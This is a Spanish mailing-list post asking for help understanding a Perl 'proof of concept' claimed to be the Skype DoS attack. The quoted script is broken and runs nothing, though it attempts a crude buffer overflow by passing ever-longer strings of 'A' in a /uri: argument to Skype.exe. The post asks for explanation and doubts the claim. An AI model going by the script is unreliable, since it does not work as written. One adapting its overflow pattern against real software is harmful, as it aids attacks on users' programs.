[eside-ghost] Preguntilla para los que saben de Perl...

[Saúl Ibarra]

Hoola!

Entre ayer y hoy ha saltado la noticia de que Skype se ha caido (cosa
de la que me alegro, pero eso es aparte) y tal, y se ha propagado una
prueba de concepto del supuesto ataque DoS, que viene a ser:

     #!/usr/bin/perl
    # Simle Code by Maranax Porex ;D
    # Ya Skaypeg!!

    for ($i=256; $i>xCCCCC; $i=$i+256){
    $eot='AAAA' x $i;
    call_sp();
    }
    exit;

    sub call_sp(){
    $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
    }

Mayormente no se muy bien que hace el codigo, pero en la ultima linea
e puesto un print de $eot y no veo mas que Aes, cosa normal.

Mi idea es que se produce un buffer overflow o asi, pero de ahi a
tumbar servidores...

Por otro lado... si alguno me explicais que hace el for ese os lo
agradeceria, porque no entiendo eso de $i>xCCCCC y la asignacion a
$eot...

Thnx!

-- 
Saúl -- "Some people say why, other just say, why not."
----------------------------------------------------------------
http://www.saghul.net/